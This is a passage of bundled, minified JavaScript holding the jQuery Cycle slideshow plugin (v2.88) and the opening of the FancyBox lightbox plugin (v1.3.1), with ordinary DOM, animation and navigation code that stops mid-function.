/*
 * jQuery Cycle Plugin (core engine)
 * Examples and documentation at: http://jquery.malsup.com/cycle/
 * Copyright (c) 2007-2010 M. Alsup
 * Version: 2.88 (08-JUN-2010)
 * Dual licensed under the MIT and GPL licenses.
 * http://jquery.malsup.com/license.html
 * Requires: jQuery v1.2.6 or later
 */
(function($){var ver="2.88";if($.support==undefined){$.support={opacity:!($.browser.msie)};}function debug(s){if($.fn.cycle.debug){log(s);}}function log(){if(window.console&&window.console.log){window.console.log("[cycle] "+Array.prototype.join.call(arguments," "));}}$.fn.cycle=function(options,arg2){var o={s:this.selector,c:this.context};if(this.length===0&&options!="stop"){if(!$.isReady&&o.s){log("DOM not ready, queuing slideshow");$(function(){$(o.s,o.c).cycle(options,arg2);});return this;}log("terminating; zero elements found by selector"+($.isReady?"":" (DOM not ready)"));return this;}return this.each(function(){var opts=handleArguments(this,options,arg2);if(opts===false){return;}opts.updateActivePagerLink=opts.updateActivePagerLink||$.fn.cycle.updateActivePagerLink;if(this.cycleTimeout){clearTimeout(this.cycleTimeout);}this.cycleTimeout=this.cyclePause=0;var $cont=$(this);var $slides=opts.slideExpr?$(opts.slideExpr,this):$cont.children();var els=$slides.get();if(els.length<2){log("terminating; too few slides: "+els.length);return;}var opts2=buildOptions($cont,$slides,els,opts,o);if(opts2===false){return;}var startTime=opts2.continuous?10:getTimeout(els[opts2.currSlide],els[opts2.nextSlide],opts2,!opts2.rev);if(startTime){startTime+=(opts2.delay||0);if(startTime<10){startTime=10;}debug("first timeout: "+startTime);this.cycleTimeout=setTimeout(function(){go(els,opts2,0,(!opts2.rev&&!opts.backwards));},startTime);}});};function handleArguments(cont,options,arg2){if(cont.cycleStop==undefined){cont.cycleStop=0;}if(options===undefined||options===null){options={};}if(options.constructor==String){switch(options){case"destroy":case"stop":var opts=$(cont).data("cycle.opts");if(!opts){return false;}cont.cycleStop++;if(cont.cycleTimeout){clearTimeout(cont.cycleTimeout);}cont.cycleTimeout=0;$(cont).removeData("cycle.opts");if(options=="destroy"){destroy(opts);}return false;case"toggle":cont.cyclePause=(cont.cyclePause===1)?0:1;checkInstantResume(cont.cyclePause,arg2,cont);return false;case"pause":cont.cyclePause=1;return false;case"resume":cont.cyclePause=0;checkInstantResume(false,arg2,cont);return false;case"prev":case"next":var opts=$(cont).data("cycle.opts");if(!opts){log('options not found, "prev/next" ignored');return false;}$.fn.cycle[options](opts);return false;default:options={fx:options};}return options;}else{if(options.constructor==Number){var num=options;options=$(cont).data("cycle.opts");if(!options){log("options not found, can not advance slide");return false;}if(num<0||num>=options.elements.length){log("invalid slide index: "+num);return false;}options.nextSlide=num;if(cont.cycleTimeout){clearTimeout(cont.cycleTimeout);cont.cycleTimeout=0;}if(typeof arg2=="string"){options.oneTimeFx=arg2;}go(options.elements,options,1,num>=options.currSlide);return false;}}return options;function checkInstantResume(isPaused,arg2,cont){if(!isPaused&&arg2===true){var options=$(cont).data("cycle.opts");if(!options){log("options not found, can not resume");return false;}if(cont.cycleTimeout){clearTimeout(cont.cycleTimeout);cont.cycleTimeout=0;}go(options.elements,options,1,(!opts.rev&&!opts.backwards));}}}function removeFilter(el,opts){if(!$.support.opacity&&opts.cleartype&&el.style.filter){try{el.style.removeAttribute("filter");}catch(smother){}}}function destroy(opts){if(opts.next){$(opts.next).unbind(opts.prevNextEvent);}if(opts.prev){$(opts.prev).unbind(opts.prevNextEvent);}if(opts.pager||opts.pagerAnchorBuilder){$.each(opts.pagerAnchors||[],function(){this.unbind().remove();});}opts.pagerAnchors=null;if(opts.destroy){opts.destroy(opts);}}function buildOptions($cont,$slides,els,options,o){var opts=$.extend({},$.fn.cycle.defaults,options||{},$.metadata?$cont.metadata():$.meta?$cont.data():{});if(opts.autostop){opts.countdown=opts.autostopCount||els.length;}var cont=$cont[0];$cont.data("cycle.opts",opts);opts.$cont=$cont;opts.stopCount=cont.cycleStop;opts.elements=els;opts.before=opts.before?[opts.before]:[];opts.after=opts.after?[opts.after]:[];opts.after.unshift(function(){opts.busy=0;});if(!$.support.opacity&&opts.cleartype){opts.after.push(function(){removeFilter(this,opts);});}if(opts.continuous){opts.after.push(function(){go(els,opts,0,(!opts.rev&&!opts.backwards));});}saveOriginalOpts(opts);if(!$.support.opacity&&opts.cleartype&&!opts.cleartypeNoBg){clearTypeFix($slides);}if($cont.css("position")=="static"){$cont.css("position","relative");}if(opts.width){$cont.width(opts.width);}if(opts.height&&opts.height!="auto"){$cont.height(opts.height);}if(opts.startingSlide){opts.startingSlide=parseInt(opts.startingSlide);}else{if(opts.backwards){opts.startingSlide=els.length-1;}}if(opts.random){opts.randomMap=[];for(var i=0;i<els.length;i++){opts.randomMap.push(i);}opts.randomMap.sort(function(a,b){return Math.random()-0.5;});opts.randomIndex=1;opts.startingSlide=opts.randomMap[1];}else{if(opts.startingSlide>=els.length){opts.startingSlide=0;}}opts.currSlide=opts.startingSlide||0;var first=opts.startingSlide;$slides.css({position:"absolute",top:0,left:0}).hide().each(function(i){var z;if(opts.backwards){z=first?i<=first?els.length+(i-first):first-i:els.length-i;}else{z=first?i>=first?els.length-(i-first):first-i:els.length-i;}$(this).css("z-index",z);});$(els[first]).css("opacity",1).show();removeFilter(els[first],opts);if(opts.fit&&opts.width){$slides.width(opts.width);}if(opts.fit&&opts.height&&opts.height!="auto"){$slides.height(opts.height);}var reshape=opts.containerResize&&!$cont.innerHeight();if(reshape){var maxw=0,maxh=0;for(var j=0;j<els.length;j++){var $e=$(els[j]),e=$e[0],w=$e.outerWidth(),h=$e.outerHeight();if(!w){w=e.offsetWidth||e.width||$e.attr("width");}if(!h){h=e.offsetHeight||e.height||$e.attr("height");}maxw=w>maxw?w:maxw;maxh=h>maxh?h:maxh;}if(maxw>0&&maxh>0){$cont.css({width:maxw+"px",height:maxh+"px"});}}if(opts.pause){$cont.hover(function(){this.cyclePause++;},function(){this.cyclePause--;});}if(supportMultiTransitions(opts)===false){return false;}var requeue=false;options.requeueAttempts=options.requeueAttempts||0;$slides.each(function(){var $el=$(this);this.cycleH=(opts.fit&&opts.height)?opts.height:($el.height()||this.offsetHeight||this.height||$el.attr("height")||0);this.cycleW=(opts.fit&&opts.width)?opts.width:($el.width()||this.offsetWidth||this.width||$el.attr("width")||0);if($el.is("img")){var loadingIE=($.browser.msie&&this.cycleW==28&&this.cycleH==30&&!this.complete);var loadingFF=($.browser.mozilla&&this.cycleW==34&&this.cycleH==19&&!this.complete);var loadingOp=($.browser.opera&&((this.cycleW==42&&this.cycleH==19)||(this.cycleW==37&&this.cycleH==17))&&!this.complete);var loadingOther=(this.cycleH==0&&this.cycleW==0&&!this.complete);if(loadingIE||loadingFF||loadingOp||loadingOther){if(o.s&&opts.requeueOnImageNotLoaded&&++options.requeueAttempts<100){log(options.requeueAttempts," - img slide not loaded, requeuing slideshow: ",this.src,this.cycleW,this.cycleH);setTimeout(function(){$(o.s,o.c).cycle(options);},opts.requeueTimeout);requeue=true;return false;}else{log("could not determine size of image: "+this.src,this.cycleW,this.cycleH);}}}return true;});if(requeue){return false;}opts.cssBefore=opts.cssBefore||{};opts.animIn=opts.animIn||{};opts.animOut=opts.animOut||{};$slides.not(":eq("+first+")").css(opts.cssBefore);if(opts.cssFirst){$($slides[first]).css(opts.cssFirst);}if(opts.timeout){opts.timeout=parseInt(opts.timeout);if(opts.speed.constructor==String){opts.speed=$.fx.speeds[opts.speed]||parseInt(opts.speed);}if(!opts.sync){opts.speed=opts.speed/2;}var buffer=opts.fx=="shuffle"?500:250;while((opts.timeout-opts.speed)<buffer){opts.timeout+=opts.speed;}}if(opts.easing){opts.easeIn=opts.easeOut=opts.easing;}if(!opts.speedIn){opts.speedIn=opts.speed;}if(!opts.speedOut){opts.speedOut=opts.speed;}opts.slideCount=els.length;opts.currSlide=opts.lastSlide=first;if(opts.random){if(++opts.randomIndex==els.length){opts.randomIndex=0;}opts.nextSlide=opts.randomMap[opts.randomIndex];}else{if(opts.backwards){opts.nextSlide=opts.startingSlide==0?(els.length-1):opts.startingSlide-1;}else{opts.nextSlide=opts.startingSlide>=(els.length-1)?0:opts.startingSlide+1;}}if(!opts.multiFx){var init=$.fn.cycle.transitions[opts.fx];if($.isFunction(init)){init($cont,$slides,opts);}else{if(opts.fx!="custom"&&!opts.multiFx){log("unknown transition: "+opts.fx,"; slideshow terminating");return false;}}}var e0=$slides[first];if(opts.before.length){opts.before[0].apply(e0,[e0,e0,opts,true]);}if(opts.after.length>1){opts.after[1].apply(e0,[e0,e0,opts,true]);}if(opts.next){$(opts.next).bind(opts.prevNextEvent,function(){return advance(opts,opts.rev?-1:1);});}if(opts.prev){$(opts.prev).bind(opts.prevNextEvent,function(){return advance(opts,opts.rev?1:-1);});}if(opts.pager||opts.pagerAnchorBuilder){buildPager(els,opts);}exposeAddSlide(opts,els);return opts;}function saveOriginalOpts(opts){opts.original={before:[],after:[]};opts.original.cssBefore=$.extend({},opts.cssBefore);opts.original.cssAfter=$.extend({},opts.cssAfter);opts.original.animIn=$.extend({},opts.animIn);opts.original.animOut=$.extend({},opts.animOut);$.each(opts.before,function(){opts.original.before.push(this);});$.each(opts.after,function(){opts.original.after.push(this);});}function supportMultiTransitions(opts){var i,tx,txs=$.fn.cycle.transitions;if(opts.fx.indexOf(",")>0){opts.multiFx=true;opts.fxs=opts.fx.replace(/\s*/g,"").split(",");for(i=0;i<opts.fxs.length;i++){var fx=opts.fxs[i];tx=txs[fx];if(!tx||!txs.hasOwnProperty(fx)||!$.isFunction(tx)){log("discarding unknown transition: ",fx);opts.fxs.splice(i,1);i--;}}if(!opts.fxs.length){log("No valid transitions named; slideshow terminating.");return false;}}else{if(opts.fx=="all"){opts.multiFx=true;opts.fxs=[];for(p in txs){tx=txs[p];if(txs.hasOwnProperty(p)&&$.isFunction(tx)){opts.fxs.push(p);}}}}if(opts.multiFx&&opts.randomizeEffects){var r1=Math.floor(Math.random()*20)+30;for(i=0;i<r1;i++){var r2=Math.floor(Math.random()*opts.fxs.length);opts.fxs.push(opts.fxs.splice(r2,1)[0]);}debug("randomized fx sequence: ",opts.fxs);}return true;}function exposeAddSlide(opts,els){opts.addSlide=function(newSlide,prepend){var $s=$(newSlide),s=$s[0];if(!opts.autostopCount){opts.countdown++;}els[prepend?"unshift":"push"](s);if(opts.els){opts.els[prepend?"unshift":"push"](s);}opts.slideCount=els.length;$s.css("position","absolute");$s[prepend?"prependTo":"appendTo"](opts.$cont);if(prepend){opts.currSlide++;opts.nextSlide++;}if(!$.support.opacity&&opts.cleartype&&!opts.cleartypeNoBg){clearTypeFix($s);}if(opts.fit&&opts.width){$s.width(opts.width);}if(opts.fit&&opts.height&&opts.height!="auto"){$slides.height(opts.height);}s.cycleH=(opts.fit&&opts.height)?opts.height:$s.height();s.cycleW=(opts.fit&&opts.width)?opts.width:$s.width();$s.css(opts.cssBefore);if(opts.pager||opts.pagerAnchorBuilder){$.fn.cycle.createPagerAnchor(els.length-1,s,$(opts.pager),els,opts);}if($.isFunction(opts.onAddSlide)){opts.onAddSlide($s);}else{$s.hide();}};}$.fn.cycle.resetState=function(opts,fx){fx=fx||opts.fx;opts.before=[];opts.after=[];opts.cssBefore=$.extend({},opts.original.cssBefore);opts.cssAfter=$.extend({},opts.original.cssAfter);opts.animIn=$.extend({},opts.original.animIn);opts.animOut=$.extend({},opts.original.animOut);opts.fxFn=null;$.each(opts.original.before,function(){opts.before.push(this);});$.each(opts.original.after,function(){opts.after.push(this);});var init=$.fn.cycle.transitions[fx];if($.isFunction(init)){init(opts.$cont,$(opts.elements),opts);}};function go(els,opts,manual,fwd){if(manual&&opts.busy&&opts.manualTrump){debug("manualTrump in go(), stopping active transition");$(els).stop(true,true);opts.busy=false;}if(opts.busy){debug("transition active, ignoring new tx request");return;}var p=opts.$cont[0],curr=els[opts.currSlide],next=els[opts.nextSlide];if(p.cycleStop!=opts.stopCount||p.cycleTimeout===0&&!manual){return;}if(!manual&&!p.cyclePause&&!opts.bounce&&((opts.autostop&&(--opts.countdown<=0))||(opts.nowrap&&!opts.random&&opts.nextSlide<opts.currSlide))){if(opts.end){opts.end(opts);}return;}var changed=false;if((manual||!p.cyclePause)&&(opts.nextSlide!=opts.currSlide)){changed=true;var fx=opts.fx;curr.cycleH=curr.cycleH||$(curr).height();curr.cycleW=curr.cycleW||$(curr).width();next.cycleH=next.cycleH||$(next).height();next.cycleW=next.cycleW||$(next).width();if(opts.multiFx){if(opts.lastFx==undefined||++opts.lastFx>=opts.fxs.length){opts.lastFx=0;}fx=opts.fxs[opts.lastFx];opts.currFx=fx;}if(opts.oneTimeFx){fx=opts.oneTimeFx;opts.oneTimeFx=null;}$.fn.cycle.resetState(opts,fx);if(opts.before.length){$.each(opts.before,function(i,o){if(p.cycleStop!=opts.stopCount){return;}o.apply(next,[curr,next,opts,fwd]);});}var after=function(){$.each(opts.after,function(i,o){if(p.cycleStop!=opts.stopCount){return;}o.apply(next,[curr,next,opts,fwd]);});};debug("tx firing; currSlide: "+opts.currSlide+"; nextSlide: "+opts.nextSlide);opts.busy=1;if(opts.fxFn){opts.fxFn(curr,next,opts,after,fwd,manual&&opts.fastOnEvent);}else{if($.isFunction($.fn.cycle[opts.fx])){$.fn.cycle[opts.fx](curr,next,opts,after,fwd,manual&&opts.fastOnEvent);}else{$.fn.cycle.custom(curr,next,opts,after,fwd,manual&&opts.fastOnEvent);}}}if(changed||opts.nextSlide==opts.currSlide){opts.lastSlide=opts.currSlide;if(opts.random){opts.currSlide=opts.nextSlide;if(++opts.randomIndex==els.length){opts.randomIndex=0;}opts.nextSlide=opts.randomMap[opts.randomIndex];if(opts.nextSlide==opts.currSlide){opts.nextSlide=(opts.currSlide==opts.slideCount-1)?0:opts.currSlide+1;}}else{if(opts.backwards){var roll=(opts.nextSlide-1)<0;if(roll&&opts.bounce){opts.backwards=!opts.backwards;opts.nextSlide=1;opts.currSlide=0;}else{opts.nextSlide=roll?(els.length-1):opts.nextSlide-1;opts.currSlide=roll?0:opts.nextSlide+1;}}else{var roll=(opts.nextSlide+1)==els.length;if(roll&&opts.bounce){opts.backwards=!opts.backwards;opts.nextSlide=els.length-2;opts.currSlide=els.length-1;}else{opts.nextSlide=roll?0:opts.nextSlide+1;opts.currSlide=roll?els.length-1:opts.nextSlide-1;}}}}if(changed&&opts.pager){opts.updateActivePagerLink(opts.pager,opts.currSlide,opts.activePagerClass);}var ms=0;if(opts.timeout&&!opts.continuous){ms=getTimeout(els[opts.currSlide],els[opts.nextSlide],opts,fwd);}else{if(opts.continuous&&p.cyclePause){ms=10;}}if(ms>0){p.cycleTimeout=setTimeout(function(){go(els,opts,0,(!opts.rev&&!opts.backwards));},ms);}}$.fn.cycle.updateActivePagerLink=function(pager,currSlide,clsName){$(pager).each(function(){$(this).children().removeClass(clsName).eq(currSlide).addClass(clsName);});};function getTimeout(curr,next,opts,fwd){if(opts.timeoutFn){var t=opts.timeoutFn.call(curr,curr,next,opts,fwd);while((t-opts.speed)<250){t+=opts.speed;}debug("calculated timeout: "+t+"; speed: "+opts.speed);if(t!==false){return t;}}return opts.timeout;}$.fn.cycle.next=function(opts){advance(opts,opts.rev?-1:1);};$.fn.cycle.prev=function(opts){advance(opts,opts.rev?1:-1);};function advance(opts,val){var els=opts.elements;var p=opts.$cont[0],timeout=p.cycleTimeout;if(timeout){clearTimeout(timeout);p.cycleTimeout=0;}if(opts.random&&val<0){opts.randomIndex--;if(--opts.randomIndex==-2){opts.randomIndex=els.length-2;}else{if(opts.randomIndex==-1){opts.randomIndex=els.length-1;}}opts.nextSlide=opts.randomMap[opts.randomIndex];}else{if(opts.random){opts.nextSlide=opts.randomMap[opts.randomIndex];}else{opts.nextSlide=opts.currSlide+val;if(opts.nextSlide<0){if(opts.nowrap){return false;}opts.nextSlide=els.length-1;}else{if(opts.nextSlide>=els.length){if(opts.nowrap){return false;}opts.nextSlide=0;}}}}var cb=opts.onPrevNextEvent||opts.prevNextClick;if($.isFunction(cb)){cb(val>0,opts.nextSlide,els[opts.nextSlide]);}go(els,opts,1,val>=0);return false;}function buildPager(els,opts){var $p=$(opts.pager);$.each(els,function(i,o){$.fn.cycle.createPagerAnchor(i,o,$p,els,opts);});opts.updateActivePagerLink(opts.pager,opts.startingSlide,opts.activePagerClass);}$.fn.cycle.createPagerAnchor=function(i,el,$p,els,opts){var a;if($.isFunction(opts.pagerAnchorBuilder)){a=opts.pagerAnchorBuilder(i,el);debug("pagerAnchorBuilder("+i+", el) returned: "+a);}else{a='<a href="#">'+(i+1)+"</a>";}if(!a){return;}var $a=$(a);if($a.parents("body").length===0){var arr=[];if($p.length>1){$p.each(function(){var $clone=$a.clone(true);$(this).append($clone);arr.push($clone[0]);});$a=$(arr);}else{$a.appendTo($p);}}opts.pagerAnchors=opts.pagerAnchors||[];opts.pagerAnchors.push($a);$a.bind(opts.pagerEvent,function(e){e.preventDefault();opts.nextSlide=i;var p=opts.$cont[0],timeout=p.cycleTimeout;if(timeout){clearTimeout(timeout);p.cycleTimeout=0;}var cb=opts.onPagerEvent||opts.pagerClick;if($.isFunction(cb)){cb(opts.nextSlide,els[opts.nextSlide]);}go(els,opts,1,opts.currSlide<i);});if(!/^click/.test(opts.pagerEvent)&&!opts.allowPagerClickBubble){$a.bind("click.cycle",function(){return false;});}if(opts.pauseOnPagerHover){$a.hover(function(){opts.$cont[0].cyclePause++;},function(){opts.$cont[0].cyclePause--;});}};$.fn.cycle.hopsFromLast=function(opts,fwd){var hops,l=opts.lastSlide,c=opts.currSlide;if(fwd){hops=c>l?c-l:opts.slideCount-l;}else{hops=c<l?l-c:l+opts.slideCount-c;}return hops;};function clearTypeFix($slides){debug("applying clearType background-color hack");function hex(s){s=parseInt(s).toString(16);return s.length<2?"0"+s:s;}function getBg(e){for(;e&&e.nodeName.toLowerCase()!="html";e=e.parentNode){var v=$.css(e,"background-color");if(v.indexOf("rgb")>=0){var rgb=v.match(/\d+/g);return"#"+hex(rgb[0])+hex(rgb[1])+hex(rgb[2]);}if(v&&v!="transparent"){return v;}}return"#ffffff";}$slides.each(function(){$(this).css("background-color",getBg(this));});}$.fn.cycle.commonReset=function(curr,next,opts,w,h,rev){$(opts.elements).not(curr).hide();opts.cssBefore.opacity=1;opts.cssBefore.display="block";if(w!==false&&next.cycleW>0){opts.cssBefore.width=next.cycleW;}if(h!==false&&next.cycleH>0){opts.cssBefore.height=next.cycleH;}opts.cssAfter=opts.cssAfter||{};opts.cssAfter.display="none";$(curr).css("zIndex",opts.slideCount+(rev===true?1:0));$(next).css("zIndex",opts.slideCount+(rev===true?0:1));};$.fn.cycle.custom=function(curr,next,opts,cb,fwd,speedOverride){var $l=$(curr),$n=$(next);var speedIn=opts.speedIn,speedOut=opts.speedOut,easeIn=opts.easeIn,easeOut=opts.easeOut;$n.css(opts.cssBefore);if(speedOverride){if(typeof speedOverride=="number"){speedIn=speedOut=speedOverride;}else{speedIn=speedOut=1;}easeIn=easeOut=null;}var fn=function(){$n.animate(opts.animIn,speedIn,easeIn,cb);};$l.animate(opts.animOut,speedOut,easeOut,function(){if(opts.cssAfter){$l.css(opts.cssAfter);}if(!opts.sync){fn();}});if(opts.sync){fn();}};$.fn.cycle.transitions={fade:function($cont,$slides,opts){$slides.not(":eq("+opts.currSlide+")").css("opacity",0);opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);opts.cssBefore.opacity=0;});opts.animIn={opacity:1};opts.animOut={opacity:0};opts.cssBefore={top:0,left:0};}};$.fn.cycle.ver=function(){return ver;};$.fn.cycle.defaults={fx:"fade",timeout:4000,timeoutFn:null,continuous:0,speed:1000,speedIn:null,speedOut:null,next:null,prev:null,onPrevNextEvent:null,prevNextEvent:"click.cycle",pager:null,onPagerEvent:null,pagerEvent:"click.cycle",allowPagerClickBubble:false,pagerAnchorBuilder:null,before:null,after:null,end:null,easing:null,easeIn:null,easeOut:null,shuffle:null,animIn:null,animOut:null,cssBefore:null,cssAfter:null,fxFn:null,height:"auto",startingSlide:0,sync:1,random:0,fit:0,containerResize:1,pause:0,pauseOnPagerHover:0,autostop:0,autostopCount:0,delay:0,slideExpr:null,cleartype:!$.support.opacity,cleartypeNoBg:false,nowrap:0,fastOnEvent:0,randomizeEffects:1,rev:0,manualTrump:true,requeueOnImageNotLoaded:true,requeueTimeout:250,activePagerClass:"activeSlide",updateActivePagerLink:null,backwards:false};})(jQuery);



/*
 * FancyBox - jQuery Plugin
 * Simple and fancy lightbox alternative
 *
 * Examples and documentation at: http://fancybox.net
 *
 * Copyright (c) 2008 - 2010 Janis Skarnelis
 *
 * Version: 1.3.1 (05/03/2010)
 * Requires: jQuery v1.3+
 *
 * Dual licensed under the MIT and GPL licenses:
 *   http://www.opensource.org/licenses/mit-license.php
 *   http://www.gnu.org/licenses/gpl.html
 */

(function(b){var m,u,x,g,D,i,z,A,B,p=0,e={},q=[],n=0,c={},j=[],E=null,s=new Image,G=/\.(jpg|gif|png|bmp|jpeg)(.*)?$/i,S=/[^\.]\.(swf)\s*$/i,H,I=1,k,l,h=false,y=b.extend(b("<div/>")[0],{prop:0}),v=0,O=!b.support.opacity&&!window.XMLHttpRequest,J=function(){u.hide();s.onerror=s.onload=null;E&&E.abort();m.empty()},P=function(){b.fancybox('<p id="fancybox_error">The requested content cannot be loaded.<br />Please try again later.</p>',{scrolling:"no",padding:0,transitionIn:"none",transitionOut:"none"})},
K=function(){return[b(window).width(),b(window).height(),b(document).scrollLeft(),b(document).scrollTop()]},T=function(){var a=K(),d={},f=c.margin,o=c.autoScale,t=(20+f)*2,w=(20+f)*2,r=c.padding*2;if(c.width.toString().indexOf("%")>-1){d.width=a[0]*parseFloat(c.width)/100-40;o=false}else d.width=c.width+r;if(c.height.toString().indexOf("%")>-1){d.height=a[1]*parseFloat(c.height)/100-40;o=false}else d.height=c.height+r;if(o&&(d.width>a[0]-t||d.height>a[1]-w))if(e.type=="image"||e.type=="swf"){t+=r;
w+=r;o=Math.min(Math.min(a[0]-t,c.width)/c.width,Math.min(a[1]-w,c.height)/c.height);d.width=Math.round(o*(d.width-r))+r;d.height=Math.round(o*(d.height-r))+r}else{d.width=Math.min(d.width,a[0]-t);d.height=Math.min(d.height,a[1]-w)}d.top=a[3]+(a[1]-(d.height+40))*0.5;d.left=a[2]+(a[0]-(d.width+40))*0.5;if(c.autoScale===false){d.top=Math.max(a[3]+f,d.top);d.left=Math.max(a[2]+f,d.left)}return d},U=function(a){if(a&&a.length)switch(c.titlePosition){case "inside":return a;case "over":return'<span id="fancybox-title-over">'+
a+"</span>";default:return'<span id="fancybox-title-wrap"><span id="fancybox-title-left"></span><span id="fancybox-title-main">'+a+'</span><span id="fancybox-title-right"></span></span>'}return false},V=function(){var a=c.title,d=l.width-c.padding*2,f="fancybox-title-"+c.titlePosition;b("#fancybox-title").remove();v=0;if(c.titleShow!==false){a=b.isFunction(c.titleFormat)?c.titleFormat(a,j,n,c):U(a);if(!(!a||a==="")){b('<div id="fancybox-title" class="'+f+'" />').css({width:d,paddingLeft:c.padding,
paddingRight:c.padding}).html(a).appendTo("body");switch(c.titlePosition){case "inside":v=b("#fancybox-title").outerHeight(true)-c.padding;l.height+=v;break;case "over":b("#fancybox-title").css("bottom",c.padding);break;default:b("#fancybox-title").css("bottom",b("#fancybox-title").outerHeight(true)*-1);break}b("#fancybox-title").appendTo(D).hide()}}},W=function(){b(document).unbind("keydown.fb").bind("keydown.fb",function(a){if(a.keyCode==27&&c.enableEscapeButton){a.preventDefault();b.fancybox.close()}else if(a.keyCode==
37){a.preventDefault();b.fancybox.prev()}else if(a.keyCode==39){a.preventDefault();b.fancybox.next()}});if(b.fn.mousewheel){g.unbind("mousewheel.fb");j.length>1&&g.bind("mousewheel.fb",function(a,d){a.preventDefault();h||d===0||(d>0?b.fancybox.prev():b.fancybox.next())})}if(c.showNavArrows){if(c.cyclic&&j.length>1||n!==0)A.show();if(c.cyclic&&j.length>1||n!=j.length-1)B.show()}},X=function(){var a,d;if(j.length-1>n){a=j[n+1].href;if(typeof a!=="undefined"&&a.match(G)){d=new Image;d.src=a}}if(n>0){a=
j[n-1].href;if(typeof a!=="undefined"&&a.match(G)){d=new Image;d.src=a}}},L=function(){i.css("overflow",c.scrolling=="auto"?c.type=="image"||c.type=="iframe"||c.type=="swf"?"hidden":"auto":c.scrolling=="yes"?"auto":"visible");if(!b.support.opacity){i.get(0).style.removeAttribute("filter");g.get(0).style.removeAttribute("filter")}b("#fancybox-title").show();c.hideOnContentClick&&i.one("click",b.fancybox.close);c.hideOnOverlayClick&&x.one("click",b.fancybox.close);c.showCloseButton&&z.show();W();b(window).bind("resize.fb",
b.fancybox.center);c.centerOnScroll?b(window).bind("scroll.fb",b.fancybox.center):b(window).unbind("scroll.fb");b.isFunction(c.onComplete)&&c.onComplete(j,n,c);h=false;X()},M=function(a){var d=Math.round(k.width+(l.width-k.width)*a),f=Math.round(k.height+(l.height-k.height)*a),o=Math.round(k.top+(l.top-k.top)*a),t=Math.round(k.left+(l.left-k.left)*a);g.css({width:d+"px",height:f+"px",top:o+"px",left:t+"px"});d=Math.max(d-c.padding*2,0);f=Math.max(f-(c.padding*2+v*a),0);i.css({width:d+"px",height:f+
"px"});if(typeof l.opacity!=="undefined")g.css("opacity",a<0.5?0.5:a)},Y=function(a){var d=a.offset();d.top+=parseFloat(a.css("paddingTop"))||0;d.left+=parseFloat(a.css("paddingLeft"))||0;d.top+=parseFloat(a.css("border-top-width"))||0;d.left+=parseFloat(a.css("border-left-width"))||0;d.width=a.width();d.height=a.height();return d},Q=function(){var a=e.orig?b(e.orig):false,d={};if(a&&a.length){a=Y(a);d={width:a.width+c.padding*2,height:a.height+c.padding*2,top:a.top-c.padding-20,left:a.left-c.padding-
20}}else{a=K();d={width:1,height:1,top:a[3]+a[1]*0.5,left:a[2]+a[0]*0.5}}return d},N=function(){u.hide();if(g.is(":visible")&&b.isFunction(c.onCleanup))if(c.onCleanup(j,n,c)===false){b.event.trigger("fancybox-cancel");h=false;return}j=q;n=p;c=e;i.get(0).scrollTop=0;i.get(0).scrollLeft=0;if(c.overlayShow){O&&b("select:not(#fancybox-tmp select)").filter(function(){return this.style.visibility!=="hidden"}).css({visibility:"hidden"}).one("fancybox-cleanup",function(){this.style.visibility="inherit"});
x.css({"background-color":c.overlayColor,opacity:c.overlayOpacity}).unbind().show()}l=T();V();if(g.is(":visible")){b(z.add(A).add(B)).hide();var a=g.position(),d;k={top:a.top,left:a.left,width:g.width(),height:g.height()};d=k.width==l.width&&k.height==l.height;i.fadeOut(c.changeFade,function(){var f=function(){i.html(m.contents()).fadeIn(c.changeFade,L)};b.event.trigger("fancybox-change");i.empty().css("overflow","hidden");if(d){i.css({top:c.padding,left:c.padding,width:Math.max(l.width-c.padding*
2,1),height:Math.max(l.height-c.padding*2-v,1)});f()}else{i.css({top:c.padding,left:c.padding,width:Math.max(k.width-c.padding*2,1),height:Math.max(k.height-c.padding*2,1)});y.prop=0;b(y).animate({prop:1},{duration:c.changeSpeed,easing:c.easingChange,step:M,complete:f})}})}else{g.css("opacity",1);if(c.transitionIn=="elastic"){k=Q();i.css({top:c.padding,left:c.padding,width:Math.max(k.width-c.padding*2,1),height:Math.max(k.height-c.padding*2,1)}).html(m.contents());g.css(k).show();if(c.opacity)l.opacity=
0;y.prop=0;b(y).animate({prop:1},{duration:c.speedIn,easing:c.easingIn,step:M,complete:L})}else{i.css({top:c.padding,left:c.padding,width:Math.max(l.width-c.padding*2,1),height:Math.max(l.height-c.padding*2-v,1)}).html(m.contents());g.css(l).fadeIn(c.transitionIn=="none"?0:c.speedIn,L)}}},F=function(){m.width(e.width);m.height(e.height);if(e.width=="auto")e.width=m.width();if(e.height=="auto")e.height=m.height();N()},Z=function(){h=true;e.width=s.width;e.height=s.height;b("<img />").attr({id:"fancybox-img",
src:s.src,alt:e.title}).appendTo(m);N()},C=function(){J();var a=q[p],d,f,o,t,w;e=b.extend({},b.fn.fancybox.defaults,typeof b(a).data("fancybox")=="undefined"?e:b(a).data("fancybox"));o=a.title||b(a).title||e.title||"";if(a.nodeName&&!e.orig)e.orig=b(a).children("img:first").length?b(a).children("img:first"):b(a);if(o===""&&e.orig)o=e.orig.attr("alt");d=a.nodeName&&/^(?:javascript|#)/i.test(a.href)?e.href||null:e.href||a.href||null;if(e.type){f=e.type;if(!d)d=e.content}else if(e.content)f="html";else if(d)if(d.match(G))f=
"image";else if(d.match(S))f="swf";else if(b(a).hasClass("iframe"))f="iframe";else if(d.match(/#/)){a=d.substr(d.indexOf("#"));f=b(a).length>0?"inline":"ajax"}else f="ajax";else f="inline";e.type=f;e.href=d;e.title=o;if(e.autoDimensions&&e.type!=="iframe"&&e.type!=="swf"){e.width="auto";e.height="auto"}if(e.modal){e.overlayShow=true;e.hideOnOverlayClick=false;e.hideOnContentClick=false;e.enableEscapeButton=false;e.showCloseButton=false}if(b.isFunction(e.onStart))if(e.onStart(q,p,e)===false){h=false;
return}m.css("padding",20+e.padding+e.margin);b(".fancybox-inline-tmp").unbind("fancybox-cancel").bind("fancybox-change",function(){b(this).replaceWith(i.children())});switch(f){case "html":m.html(e.content);F();break;case "inline":b('<div class="fancybox-inline-tmp" />').hide().insertBefore(b(a)).bind("fancybox-cleanup",function(){b(this).replaceWith(i.children())}).bind("fancybox-cancel",function(){b(this).replaceWith(m.children())});b(a).appendTo(m);F();break;case "image":h=false;b.fancybox.showActivity();
